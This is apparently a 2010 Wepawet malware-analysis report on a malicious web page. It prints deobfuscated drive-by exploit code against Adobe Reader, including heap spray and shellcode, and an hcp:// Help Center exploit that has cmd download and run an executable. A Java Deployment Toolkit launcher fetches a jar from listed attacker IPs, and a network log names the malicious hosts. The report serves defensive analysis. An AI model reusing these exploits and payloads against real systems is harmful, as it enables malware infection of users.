Wepawet

Home | About | Sample Reports | Tools | News Log in | Register

Analysis report for http://peninsula.co.nz/x.html

Sample Overview

URL	http://peninsula.co.nz/x.html
MD5	a237ffa8d4140ea856e10f2e3f1542b9
Analysis Started	2010-08-06 07:18:43
Report Generated	2010-08-06 07:19:09
Jsand version	1.02.02

See the report for domain peninsula.co.nz.

Detection results

Detector	Result
Jsand 1.02.02	malicious

Exploits

Name	Description	Reference
Adobe util.printf overflow	Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf	CVE-2008-2992
Adobe getIcon	Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object	CVE-2009-0927

Deobfuscation results

Evals

• Drtfnpj8 = 'U';
  

  (repeated 1 time)

• document
  

  (repeated 1 time)

• var l = {
    n : 30946
  }
  ;
  try {
    var gX = 'z'.substring(13408)
  }
  catch (gX){
  }
  ;
  var wP = {
    f : 23228
  }
  ;
  try {
    var lI = 'jU'.substring(4283)
  }
  catch (lI){
  }
  ;
  var mD = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';
  iL = 3230;
  iL += 180;
  yN = 15450;
  yN += 80;
  var gJ = new Array();
  var hG = this .info['j'].replace(/[\s]/g, '');
  try {
    var lM = 'jC'.substring(25941, 25941)
  }
  catch (lM){
  }
  ;
  try {
    var yT = 'yX'.substring(1766, 1766)
  }
  catch (yT){
  }
  ;
  try {
    var mV = 'pU'.substring(21794, 21794)
  }
  catch (mV){
  }
  ;
  var wRO = this .info;
  var qR = (wRO.producer.substr(0, 5) == 'debug');
  var nC = new Array();
  var sV = "%u";
  function xE(str){
    str = str.split(sV);
    var ret = "";
    for (var iin str){
      if (str[i] != "")ret += String.fromCharCode(parseInt(str[i], 16));
    }
    return ret;
  }
  function gR(str1, str2){
    return [str1, str2].join("");
  }
  function bC(gJG){
    var eR = fE();
    var qX = fA();
    eR += ((eR.indexOf("?") >  - 1) ? "&" : "?") + "reader_version=" + qX;
    if (qR)app.alert("URL: " + eR);
    eR = oN(eR);
    var d = sV;
    var hO = d + "C033" + d + "8B64" + d + "3040" + d + "0C78" + d + "408B" + d + "8B0C" + d
     + "1C70" + d + "8BAD" + d + "0858" + d + "09EB" + d + "408B" + d + "8D34" + d + "7C40" + 
    d + "588B" + d + "6A3C" + d + "5A44" + d + "E2D1" + d + "E22B" + d + "EC8B" + d + "4FEB"
     + d + "525A" + d + "EA83" + d + "8956" + d + "0455" + d + "5756" + d + "738B" + d + 
    "8B3C" + d + "3374" + d + "0378" + d + "56F3" + d + "768B" + d + "0320" + d + "33F3" + d
     + "49C9" + d + "4150" + d + "33AD" + d + "36FF" + d + "BE0F" + d + "0314" + d + "F238" + 
    d + "0874" + d + "CFC1" + d + "030D" + d + "40FA" + d + "EFEB" + d + "3B58" + d + "75F8"
     + d + "5EE5" + d + "468B" + d + "0324" + d + "66C3" + d + "0C8B" + d + "8B48" + d + 
    "1C56" + d + "D303" + d + "048B" + d + "038A" + d + "5FC3" + d + "505E" + d + "8DC3" + d
     + "087D" + d + "5257" + d + "33B8" + d + "8ACA" + d + "E85B" + d + "FFA2" + d + "FFFF" + 
    d + "C032" + d + "F78B" + d + "AEF2" + d + "B84F" + d + "2E65" + d + "7865" + d + "66AB"
     + d + "6698" + d + "B0AB" + d + "8A6C" + d + "98E0" + d + "6850" + d + "6E6F" + d + 
    "642E" + d + "7568" + d + "6C72" + d + "546D" + d + "8EB8" + d + "0E4E" + d + "FFEC" + d
     + "0455" + d + "5093" + d + "C033" + d + "5050" + d + "8B56" + d + "0455" + d + "C283" + 
    d + "837F" + d + "31C2" + d + "5052" + d + "36B8" + d + "2F1A" + d + "FF70" + d + "0455"
     + d + "335B" + d + "57FF" + d + "B856" + d + "FE98" + d + "0E8A" + d + "55FF" + d + 
    "5704" + d + "EFB8" + d + "E0CE" + d + "FF60" + d + "0455";
    hO += eR;
    return xE(hO);
  }
  ;
  function fE(){
    var qXY = (wRO.author + wRO.title).replace(/[\s]/g, '');
    var aZ = lU(qXY, hG, mD);
    return aZ;
  }
  ;
  function lU(qXY, mD, hG){
    var aZ = "";
    for (var i = 0; i < qXY.length; i ++ ){
      var gP = mD.indexOf(qXY[i]);
      if (gP >  - 1){
        aZ += hG[gP];
      }
    }
    return aZ;
  }
  ;
  function oN(qXY){
    var out = "";
    qXY = xEZ(qXY);
    g = Math.round(qXY.length / 4);
    if (g != qXY.length / 4)qXY += "00";
    for (var i = 0; i < qXY.length; i += 4){
      out += sV + qXY.substr(i + 2, 2) + qXY.substr(i, 2);
    }
    return out;
  }
  ;
  function xEZ(s){
    var i, f = 0, a = [];
    s += '';
    f = s.length;
    for (i = 0; i < f; i ++ ){
      a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/, "0$1").toUpperCase();
    }
    return a.join('');
  }
  ;
  function hK(sP, len){
    while (sP.length * 2 < len){
      sP = gR(sP, sP);
    }
    return sP.substring(0, len / 2);
  }
  ;
  function dK(aH){
    var jA = 0x0c0c0c0c;
    iR = bC("pdf");
    if (aH == 1){
      jA = 0x30303030;
    }
    var nK = 0x400000;
    var ln = iR.length * 2;
    var qHM = nK - (ln + 0x38);
    var sP = xE(sV + "9090" + sV + "9090");
    sP = hK(sP, qHM);
    var wH = (jA - 0x400000) / nK;
    for (var rU = 0; rU < wH; rU ++ ){
      nC[rU] = gR(sP, iR);
    }
  }
  ;
  function fA(){
    try {
      return app.viewerVersion.toString();
    }
    catch (kDY){
      return 0;
    }
  }
  if (qR)app.alert("called exploit");
  var qX = fA();
  if (qR)app.alert("v: " + qX);
  if (qX > 8){
    if (qR)app.alert("util.printf");
    dK(1);
    var kT = "12999999999999999999";
    for (fS = 0; fS < 276; fS ++ )kT += "8";
    util.printf("%45000f", kT);
  }
  if (qX < 8){
    if (qR)app.alert("Collab.collectEmailInfo");
    dK(0);
    var uF = xE(sV + "0c0c" + sV + "0c0c");
    while (uF.length < 44952)uF += uF;
    this .collabStore = Collab.collectEmailInfo({
      subj : "", msg : uF
    }
    );
  }
  if (qX < 9.1){
    if (app.doc.Collab.getIcon){
      if (qR)app.alert("Collab.getIcon");
      dK(0);
      var fU = unescape("%09");
      while (fU.length < 0x4000)fU += fU;
      fU = "N." + fU;
      app.doc.Collab.getIcon(fU);
    }
  }
  if (qX == 9.2){
    if (qR)app.alert("media.newPlayer");
    dK(1);
    var sf = "1.000000000.000000000.1337 : 3.13.37";
    util.printd(sf, new Date());
    try {
      media.newPlayer(null);
    }
    catch (e){
    }
    util.printd(sf, new Date());
  }
  var rA = ["h", "rI"];
  wFC = 25149;
  wFC--;
  var bE = {
  }
  ;
  var uN = {
    fMN : false
  }
  ;
  

  (repeated 1 time)

Writes

• <script language="javascript">if ((document.all) && (navigator.appVersion.indexOf('MSIE 7.') !=- 1))document.write("
  <iframe src=\"hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A
  %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
  %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
  %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
  %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
  %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
  %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
  %%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28unescape%
  28%27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd%2B%252Fc%2Bcd%2
  B..%252F%2526echo%2Bfunction%2Baa%2528bb%2529%257Br599%253Bfor%2528i5bb.length%253Bi%253E5
  0%253Bi--%2529r%252B5bb.charAt%2528i%2529%253Breturn%2Br%257Dnew%2BFunction%2528aa%25289%2
  53B%25292%252CCexe.tratsC%2528%255DCeliC%252BCFoTevaSC%255Bo%253B%2529%255DCydoBesnoC%252B
  CpserC%255Bx%2528etirW.o%253B%2529%2528nepO.o%253B15epyT.o%253B35edoM.o%253B%2529llun%2528
  dnes.x%253B%25290%252CC015dip%252615di%253Fphp.emoclew%252F0808%253Aur.supotcokcolb%252F%2
  52F%253AptthC%252CCTEGC%2528nepo.x%253B%2529CPTTHLC%252BCMX.tfosorciMC%2528a%2Bwen5x%253B%
  2529y%2528a%2Bwen5o%253BCmaertS.BDODAC5y%253B%255DCtceC%252BCjbOXeviC%252BCtcAC%255Bsiht%2
  B5%2Ba9%2529%2529%2528%2529%253B%253E.js%2526cscript%2B.js%2526del%2B%252Fq%2B.js%2526star
  t.exe%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelp%252A%2522.replace%2528%252FC%252Fg%252CString
  .fromCharCode%252834%2529%2529.replace%2528%252F5%252Fg%252CString.fromCharCode%252861%252
  9%2529.replace%2528%252F9%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%
  27%29%29%3C%2Fscript%3E\"></iframe>");
  Wyzaqd205 = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
  for (iin Wyzaqd205){
    try {
      O91v83pz = new ActiveXObject(Wyzaqd205[i]);
      if (O91v83pz){
        H7jhl9 = document.createElement("iframe");
        H7jhl9.setAttribute("src", "Notes10.pdf");
        document.body.appendChild(H7jhl9);
      }
    }
    catch (e){
    }
  }
  try {
    if (navigator.javaEnabled()){
      Tpnu7tw = document.createElement("iframe");
      Tpnu7tw.setAttribute("src", "Applet10.html");
      document.body.appendChild(Tpnu7tw);
    }
  }
  catch (e){
  }
  try {
    if (navigator.javaEnabled()){
      var ips = ["203.81.55.153", "207.38.126.66", "70.38.64.49", "74.208.173.189", 
      "79.99.133.99", "83.222.30.178", "91.121.92.165", "91.135.228.235", "91.203.133.223", 
      "94.23.211.84"];
      var ip = ips[Math.round(Math.random() * (ips.length - 1))];
      var u = "http: -J-jar -J\\\\" + ip + "\\public\\0010.jar none";
      if (window.navigator.appName == "Microsoft Internet Explorer"){
        var o = document.createElement("OBJECT");
        o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
        o.launch(u);
      }
      else {
        var o = document.createElement("OBJECT");
        var n = document.createElement("OBJECT");
        o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
        n.type = "application/java-deployment-toolkit";
        document.body.appendChild(o);
        document.body.appendChild(n);
        try {
          o.launch(u);
        }
        catch (e){
          n.launch(u);
        }
      }
    }
  }
  catch (e){
  }
  </script>
  

  (repeated 1 time)

• <iframe src=
  "hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%
  A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
  %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
  %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%
  A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
  %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
  %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28un
  escape%28%27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd%2B%252Fc%2Bcd%2B..
  %252F%2526echo%2Bfunction%2Baa%2528bb%2529%257Br599%253Bfor%2528i5bb.length%253Bi%253E50%253Bi--%252
  9r%252B5bb.charAt%2528i%2529%253Breturn%2Br%257Dnew%2BFunction%2528aa%25289%253B%25292%252CCexe.trat
  sC%2528%255DCeliC%252BCFoTevaSC%255Bo%253B%2529%255DCydoBesnoC%252BCpserC%255Bx%2528etirW.o%253B%252
  9%2528nepO.o%253B15epyT.o%253B35edoM.o%253B%2529llun%2528dnes.x%253B%25290%252CC015dip%252615di%253F
  php.emoclew%252F0808%253Aur.supotcokcolb%252F%252F%253AptthC%252CCTEGC%2528nepo.x%253B%2529CPTTHLC%2
  52BCMX.tfosorciMC%2528a%2Bwen5x%253B%2529y%2528a%2Bwen5o%253BCmaertS.BDODAC5y%253B%255DCtceC%252BCjb
  OXeviC%252BCtcAC%255Bsiht%2B5%2Ba9%2529%2529%2528%2529%253B%253E.js%2526cscript%2B.js%2526del%2B%252
  Fq%2B.js%2526start.exe%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelp%252A%2522.replace%2528%252FC%252Fg%252
  CString.fromCharCode%252834%2529%2529.replace%2528%252F5%252Fg%252CString.fromCharCode%252861%2529%2
  529.replace%2528%252F9%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%27%29%29%3C%2
  Fscript%3E"></iframe>
  

  (repeated 1 time)

• <img src="/counter.php?nocache=42865&aid=&said=" width=1 height=1>
  

  (repeated 1 time)

Network Activity

Requests

URL	Status	Content Type
http://peninsula.co.nz/x.html	200	text/javascript
about:blank	200	text/html
http://yummyeyes.ru:8080/index.php?pid=10	200	text/html
http://yummyeyes.ru:8080/jquery.jxx?v=5.3.4	200	text/javascript
http://yummyeyes.ru:8080/Notes10.pdf	200	application/pdf
http://spruceteam.com	200	text/html
http://spruceteam.com/themes/card.js	200	text/html

Redirects

No redirects.

ActiveX controls

• AcroPDF.PDF
  No attribute setting or method call detected

• AcrobatJavaScript
  	Name	Arg0	Arg1	Count
  Methods	info.Author			2
  	info.j			1
  	util.printf	%45000f	12999999999999999999888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888888	1
  	Collab.getIcon	N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ ..................................................................		1
  	info.Producer			1
  	info.Title			2

• PDF.PdfCtrl
  No attribute setting or method call detected

• clsid:ca8a9780-280d-11cf-a24d-444553540000
  No attribute setting or method call detected

Shellcode and Malware

No shellcode was identified.

No additional malware was retrieved.

© 2008–2012 The Regents of the University of California